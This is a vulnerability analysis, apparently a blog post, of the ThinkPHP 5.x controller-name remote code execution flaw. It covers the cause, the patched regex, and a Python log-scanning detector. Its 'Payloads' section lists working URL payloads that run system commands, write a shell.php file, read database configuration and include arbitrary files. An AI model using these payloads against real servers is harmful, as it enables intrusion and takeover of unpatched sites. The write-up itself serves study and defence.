Contents
- Vulnerability overview
- Initial setup
- Exploitation
- Vulnerability analysis
- Fix
- Attack summary
Vulnerability overview
- This vulnerability exists because the ThinkPHP core does not properly validate the controller name. When forced routing is not enabled, a user can invoke any method of any loaded class, which ultimately leads to remote code execution.
- Affected versions:
5.0.7<=ThinkPHP5<=5.0.22, 5.1.0<=ThinkPHP<=5.1.30
Initial setup
Fetch the test environment code:
composer create-project --prefer-dist topthink/think tpdemo

Set the require field of composer.json as follows:
"require": {
"php": ">=5.6.0",
"topthink/framework": "5.1.30"
},
Then run:
composer update

Exploitation
Payloads
5.1.x
?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
5.0.x
?s=index/think\config/get&name=database.username # read configuration values
?s=index/\think\Lang/load&file=../../test.jpg # include an arbitrary file
?s=index/\think\Config/load&file=../../t.php # include an arbitrary .php file
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

Vulnerability analysis
A default ThinkPHP installation does not enable the forced-routing option, and route compatibility mode is enabled by default.

With forced routing disabled, the compatibility-mode s parameter can be used, and since the framework does not check the controller name sufficiently, it may be possible to invoke arbitrary controllers. So we try a URL of the form http://site/?s=module/controller/method. The earlier ThinkPHP SQL injection analysis noted that every user parameter passes through the Request class's input method, which calls filterValue, and filterValue in turn uses call_user_func; that method is therefore a natural first target:
http://127.0.0.1/cms/public/?s=index/\think\Request/input&filter[]=phpinfo&data=1
Looking through the project's commit history shows that a check on the controller name was later added.

Step into thinkphp/library/think/route/dispatch/Module.php and set a breakpoint at the $controller assignment: the controller name is taken from $result, and $result comes from the compatibility-mode pathinfo, i.e. the s parameter.


Step into thinkphp/library/think/App.php: the App class's run method calls the Dispatch class's run method; following thinkphp/library/think/route/Dispatch.php shows that this method calls the key function exec.


In the exec function the program uses reflection to call the class's method. The class, the method and the arguments are all user-controlled, and nowhere along this path is the controller name validated; this is the direct cause of the remote code execution vulnerability.



The analysis above targets ThinkPHP 5.1.x. Running those payloads unchanged against ThinkPHP 5.0.x, many of them fail, because the two major versions load different classes and so the usable classes differ. The table below lists the classes loaded by each version (left column 5.1.x, right column 5.0.x; 5.1.x loads more classes, so its column is longer).
ThinkPHP 5.1.x ThinkPHP 5.0.x
stdClass stdClass
Exception Exception
ErrorException ErrorException
Closure Closure
Generator Generator
DateTime DateTime
DateTimeImmutable DateTimeImmutable
DateTimeZone DateTimeZone
DateInterval DateInterval
DatePeriod DatePeriod
LibXMLError LibXMLError
DOMException DOMException
DOMStringList DOMStringList
DOMNameList DOMNameList
DOMImplementationList DOMImplementationList
DOMImplementationSource DOMImplementationSource
DOMImplementation DOMImplementation
DOMNode DOMNode
DOMNameSpaceNode DOMNameSpaceNode
DOMDocumentFragment DOMDocumentFragment
DOMDocument DOMDocument
DOMNodeList DOMNodeList
DOMNamedNodeMap DOMNamedNodeMap
DOMCharacterData DOMCharacterData
DOMAttr DOMAttr
DOMElement DOMElement
DOMText DOMText
DOMComment DOMComment
DOMTypeinfo DOMTypeinfo
DOMUserDataHandler DOMUserDataHandler
DOMDomError DOMDomError
DOMErrorHandler DOMErrorHandler
DOMLocator DOMLocator
DOMConfiguration DOMConfiguration
DOMCdataSection DOMCdataSection
DOMDocumentType DOMDocumentType
DOMNotation DOMNotation
DOMEntity DOMEntity
DOMEntityReference DOMEntityReference
DOMProcessingInstruction DOMProcessingInstruction
DOMStringExtend DOMStringExtend
DOMXPath DOMXPath
finfo finfo
LogicException LogicException
BadFunctionCallException BadFunctionCallException
BadMethodCallException BadMethodCallException
DomainException DomainException
InvalidArgumentException InvalidArgumentException
LengthException LengthException
OutOfRangeException OutOfRangeException
RuntimeException RuntimeException
OutOfBoundsException OutOfBoundsException
OverflowException OverflowException
RangeException RangeException
UnderflowException UnderflowException
UnexpectedValueException UnexpectedValueException
RecursiveIteratorIterator RecursiveIteratorIterator
IteratorIterator IteratorIterator
FilterIterator FilterIterator
RecursiveFilterIterator RecursiveFilterIterator
CallbackFilterIterator CallbackFilterIterator
RecursiveCallbackFilterIterator RecursiveCallbackFilterIterator
ParentIterator ParentIterator
LimitIterator LimitIterator
CachingIterator CachingIterator
RecursiveCachingIterator RecursiveCachingIterator
NoRewindIterator NoRewindIterator
AppendIterator AppendIterator
InfiniteIterator InfiniteIterator
RegexIterator RegexIterator
RecursiveRegexIterator RecursiveRegexIterator
EmptyIterator EmptyIterator
RecursiveTreeIterator RecursiveTreeIterator
ArrayObject ArrayObject
ArrayIterator ArrayIterator
RecursiveArrayIterator RecursiveArrayIterator
SplFileInfo SplFileInfo
DirectoryIterator DirectoryIterator
FilesystemIterator FilesystemIterator
RecursiveDirectoryIterator RecursiveDirectoryIterator
GlobIterator GlobIterator
SplFileObject SplFileObject
SplTempFileObject SplTempFileObject
SplDoublyLinkedList SplDoublyLinkedList
SplQueue SplQueue
SplStack SplStack
SplHeap SplHeap
SplMinHeap SplMinHeap
SplMaxHeap SplMaxHeap
SplPriorityQueue SplPriorityQueue
SplFixedArray SplFixedArray
SplObjectStorage SplObjectStorage
MultipleIterator MultipleIterator
SessionHandler SessionHandler
ReflectionException ReflectionException
Reflection Reflection
ReflectionFunctionAbstract ReflectionFunctionAbstract
ReflectionFunction ReflectionFunction
ReflectionParameter ReflectionParameter
ReflectionMethod ReflectionMethod
ReflectionClass ReflectionClass
ReflectionObject ReflectionObject
ReflectionProperty ReflectionProperty
ReflectionExtension ReflectionExtension
ReflectionZendExtension ReflectionZendExtension
__PHP_Incomplete_Class __PHP_Incomplete_Class
php_user_filter php_user_filter
Directory Directory
SimpleXMLElement SimpleXMLElement
SimpleXMLIterator SimpleXMLIterator
SoapClient SoapClient
SoapVar SoapVar
SoapServer SoapServer
SoapFault SoapFault
SoapParam SoapParam
SoapHeader SoapHeader
PharException PharException
Phar Phar
PharData PharData
PharFileInfo PharFileInfo
XMLReader XMLReader
XMLWriter XMLWriter
ZipArchive ZipArchive
PDOException PDOException
PDO PDO
PDOStatement PDOStatement
PDORow PDORow
CURLFile CURLFile
Collator Collator
NumberFormatter NumberFormatter
Normalizer Normalizer
Locale Locale
MessageFormatter MessageFormatter
IntlDateFormatter IntlDateFormatter
ResourceBundle ResourceBundle
Transliterator Transliterator
IntlTimeZone IntlTimeZone
IntlCalendar IntlCalendar
IntlGregorianCalendar IntlGregorianCalendar
Spoofchecker Spoofchecker
IntlException IntlException
IntlIterator IntlIterator
IntlBreakIterator IntlBreakIterator
IntlRuleBasedBreakIterator IntlRuleBasedBreakIterator
IntlCodePointBreakIterator IntlCodePointBreakIterator
IntlPartsIterator IntlPartsIterator
UConverter UConverter
JsonIncrementalParser JsonIncrementalParser
mysqli_sql_exception mysqli_sql_exception
mysqli_driver mysqli_driver
mysqli mysqli
mysqli_warning mysqli_warning
mysqli_result mysqli_result
mysqli_stmt mysqli_stmt
Composer\Autoload\ComposerStaticInit81a0c33d33d83a86fdd976e2aff753d9 Composer\Autoload\ComposerStaticInit8a67cf04fc9c0db5b85a9d897c12a44c
think\Loader think\Loader
think\Error think\Error
think\Container think\Config
think\App think\App
think\Env think\Request
think\Config think\Hook
think\Hook think\Env
think\Facade think\Lang
think\facade\Env think\Log
env think\Route
think\Db
think\Lang
think\Request
think\facade\Route
route
think\Route
think\route\Rule
think\route\RuleGroup
think\route\Domain
think\route\RuleItem
think\route\RuleName
think\route\Dispatch
think\route\dispatch\Url
think\route\dispatch\Module
think\Middleware
think\Cookie
think\View
think\view\driver\Think
think\Template
think\template\driver\File
think\Log
think\log\driver\File
think\Session
think\Debug
think\Cache
think\cache\Driver
think\cache\driver\File
Fix
The official fix adds the regular expression ^[A-Za-z](\w)*$ to validate the controller name.
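To show what the fix's rule actually rejects, and how a defender can apply the same rule to web-server logs to spot compatibility-mode requests that name a backslash-qualified class instead of a real controller, here is an added Python example (written for this page, not ThinkPHP's own code). It assumes a common-log-format access log; the sample lines are constructed, and the regex is the one quoted above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Controller-name rule from the official fix quoted on the page.
CONTROLLER_RE = re.compile(r'^[A-Za-z](\w)*$')
# Common-log-format line; only the client IP and the request URL are needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<url>\S+) HTTP/')

# Constructed sample access log (not real traffic); backslashes are logged unencoded.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /cms/public/?s=index/index/index HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2020:10:00:01 +0000] "GET /cms/public/?s=index/\think\Request/input&filter[]=phpinfo&data=1 HTTP/1.1" 200 4096
10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /cms/public/?s=index/think\config/get&name=database.username HTTP/1.1" 200 200
10.0.0.3 - - [01/Jan/2020:10:00:03 +0000] "GET /cms/public/index.php?s=admin/User/list HTTP/1.1" 200 1024
"""

def controller_name_is_valid(name: str) -> bool:
    """The fix's check: a letter first, then word characters only, so no backslash namespaces."""
    return CONTROLLER_RE.match(name) is not None

def route_from_s(url: str):
    """Split a compatibility-mode ?s=module/controller/method value as the page describes.
    Returns (module, controller, method), or None when no controller is given.
    parse_qs percent-decodes, so an encoded %5C arrives here as a backslash."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = query.get('s')
    if not values:
        return None
    parts = values[0].strip('/').split('/')
    if len(parts) < 2:
        return None
    method = parts[2] if len(parts) > 2 else 'index'
    return parts[0], parts[1], method

def flag_suspicious_routes(log_text: str):
    """Return (client_ip, controller) for requests whose controller name the fix would reject."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.search(line)
        if not match:
            continue
        route = route_from_s(match.group('url'))
        if route is not None and not controller_name_is_valid(route[1]):
            hits.append((match.group('ip'), route[1]))
    return hits
```

On the sample log the two requests naming think\Request and think\config are flagged, while the ordinary index and User controllers pass, which is exactly the distinction the patched framework makes.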

Attack summary
Based on Mochazz's audit workflow.

Please credit the source when reposting; original link: https://www.uj5u.com/qita/294401.html